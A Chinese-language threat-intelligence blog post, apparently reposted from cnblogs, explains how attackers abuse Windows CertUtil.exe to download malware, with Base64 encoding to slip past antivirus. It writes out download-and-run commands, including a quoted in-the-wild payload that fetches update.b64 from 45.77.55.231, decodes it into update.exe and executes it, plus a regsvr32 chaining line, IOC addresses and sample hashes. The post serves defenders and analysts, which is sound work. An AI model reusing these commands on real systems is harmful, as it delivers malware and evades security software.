1、前言

经过国外文章信息,CertUtil.exe下载恶意软件的样本。

2、实现原理

Windows有一个名为CertUtil的内置程序,可用于在Windows中管理证书。使用此程序可以在Windows中安装,备份,删除,管理和执行与证书和证书存储相关的各种功能。

CertUtil的一个特性是能够从远程URL下载证书或任何其他文件。

使用语法 :


"certutil.exe -urlcache -split -f [URL] output.file"

Casey Smith(https://twitter.com/subTee) 在2017年就已经公布的相关利用方法。


certutil -urlcache -split -f [serverURL] file.blahregsvr32.exe /s /u /I:file.blah scrub.dll

3、实际例子

目前在威胁情报平台里已经可以搜索到利用这种手法的相关病毒样本,样本中利用的方法:

4、混淆方式

  • 使用CertUtil + Base64来绕过安全软件

通过Base64对恶意文件进行编码,使恶意代码样本看起来像是无害的文本文件,然后使用CertUtil.exe下载后对其进行解码。下载了文本文件使用“Certutil.exe -decode”命令将Base64编码文件解码为可执行文件。


C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txtC:\Temp>certutil.exe -decode bad.txt bad.exe

在F5 Labs上有一篇利用漏洞的文章中提到了利用certutil下载文件的方式攻击Web服务器。Payload部分内容如下:

一旦文件下载并使用certutil进行 base64解码,它将被保存为update.exe并执行。

certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64&certutil -decode update.b64 update.exe&update.exe

5、样本HASH与分析结果

  • 分析平台分析结果:

https://www.hybrid-analysis.com/sample/87cf118bff58c38bc0d54c1d3fcc553e381df838437a99a2006dd8f726406c16?environmentId=100https://www.virustotal.com/en/file/1a3cd50fcc7a454025a641ffcc941353b4a7998c36066b399c72cb8cbff61071/analysis/1522278762/https://www.hybrid-analysis.com/sample/4faf0c88f41121038709e9a9d134736dfadf6e1f1f4fdb6812fc69818a9e8572?environmentId=100https://www.hybrid-analysis.com/sample/3bdecb8b3aaad6822a15011e5c9f10663c3ead64a61350148518b32f176ba02c?environmentId=100

  • IOC(Indicators of Compromise)

    • IP:
45[.]77[.]55[.]231
181[.]214[.]87[.]240
181[.]214[.]87[.]241
148[.]251[.]133[.]246
  • 文件名与HASH值:
update.b64: 66107b01bc93c8d4cf2e8a6a8faffb56
update.exe: 5bb5d3cb837d97174eddc681ca98aa80
msi64.zip: 8d8b8abe93aea52f9865f045a49912ae
SearchIndexer.exe: 1dd8ea5dd6975eb3d0dd14d71d1a404d
mssearch.exe: 47d3a5023d0cbe76a030bfac7bcfe2f2

6、参考

https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
https://f5.com/labs/articles/threat-intelligence/malware/old-dog-new-targets-switching-to-windows-to-mine-electroneum
https://www.bleepingcomputer.com/news/security/regsvr32-can-be-used-to-install-ransomware-through-jscript-installers/

转载于:https://www.cnblogs.com/17bdw/p/8728656.html

CertUtil.exe被利用来下载恶意软件相关推荐

  1. php 获取远程文件mine,使用CertUtil.exe下载远程文件

    使用CertUtil.exe下载远程文件 1.前言 经过国外文章信息,CertUtil.exe下载恶意软件的样本. 2.实现原理 Windows有一个名为CertUtil的内置程序,可用于在Windo ...

  2. 利用certutil.exe实现在批处理(bat)中嵌入可执行文件或者各种媒体、图片之类二进制文件的简单方法!...

    实际上利用certutil.exe 把二进制文件(包括各种文件,exe可执行程序,图片,声音,mp3) 经过base64编码为文本,可以实现把这些文件嵌入到批处理代码中. 有什么用?: 举个例子,批处 ...

  3. s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)

    Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21: 增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过 ...

  4. s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)-阿里云开发者社区...

    Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21: 增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过 ...

  5. cdb.exe的利用

    cdb.exe的利用 0x01 简介 cdb 是安装 windows debugging tools 时自带的一个命令行调试工具,由微软签发证书. 0x02 cdb.exe加载shellcode ​ ...

  6. 利用nvm下载nodejs

    利用nvm下载nodejs 在开发过程会一直遇到nodejs的版本问题,直接安装则只有一个版本,极其不方便 nvm则是用来管理nodejs的工具,可以通过nvm来安装切换不同版本的nodejs 安装前 ...

  7. Windows certutil.exe 命令 简单举例 计算MD5与SHA1/256

    Certutil 是 Windows 操作系统上预装的工具,是一个 CLI 程序,可用于转储和显示证书颁发机构(CA),配置信息,证书服务, CA 组件的备份和还原以及验证证书.密钥对和证书链, 校验 ...

  8. Anaconda:成功解决利用conda下载pytorch和torchvision时速度超慢的问题

    Anaconda:成功解决利用conda下载pytorch和torchvision时速度超慢的问题 目录 解决问题 解决思路 解决方法 解决问题 利用conda 下载pytorch和torchvisi ...

  9. vue 文件转换二进制_Vue利用Blob下载原生二进制数组文件

    本文实例为大家分享了Vue利用Blob下载原生二进制数组文件的具体代码,供大家参考,具体内容如下 在服务端推送过来的二进制数组(JSON格式),在前端要处理成JS原生数组以后才能做成Blob,有两个地 ...

最新文章

  1. (转)有了jQuery.Jcrop,选取美女的哪个部位你说了算
  2. mysql 相关命令
  3. linux安装 mysql-5.7.25_Linux 系统下安装 mysql5.7.25(glibc版)
  4. python培训出来的有公司要吗-python培训机构出来好就业吗
  5. 吉林高考成绩查询2021年几号公布,2021年吉林高考成绩查询时间及查分方式
  6. android沉浸式 字体,全面解析android沉浸式状态栏
  7. LeetCode 2035. 将数组分成两个数组并最小化数组和的差(状态压缩DP)
  8. 高仿阴阳师官网轮播图效果的jQuery插件
  9. 在Docker中安装和部署MongoDB集群
  10. Sencha Cmd 6 和 Ext JS 6 指南文档(部分官方文档中文翻译)
  11. 英特尔立 Flag:年末一定彻底解决“芯片门”Bug!
  12. 基于视图的DNS解析
  13. Java学习系列(十)Java面向对象之I/O流(上)
  14. 突发,Spring框架发现重大漏洞!
  15. EEPROM、FLASH、NOR FLASH、NAND FLASH 区别、关系总结
  16. 如何冻结excel表格前二列
  17. hdu 5211 Mutiple
  18. 图像增强—彩色增强技术
  19. 自动化如何影响到你?传统5天工作制或成过去
  20. XTU 1148 三角形

热门文章

  1. python测试脚本截图_selenium + python实现截图并且保存图片
  2. mysql 3种报错_MySQL读取Binlog日志常见的3种错误-阿里云开发者社区
  3. stm32 薄膜键盘原理_市面上的笔记本键盘优缺点解析,看完秒懂
  4. lob移表空间 oracle_Oracle数据库(1)Oracle体系结构概述(一)
  5. metasploitable3渗透测试
  6. java集合转换_java各种集合的转换
  7. fsync与fflush的关系和区别
  8. 【竞赛题解】Codeforces Round #715 (Div. 2) C
  9. 经典算法研究系列:十、从头到尾彻底理解傅里叶变换算法、下
  10. 377. 组合总和 Ⅳ golang 动态规划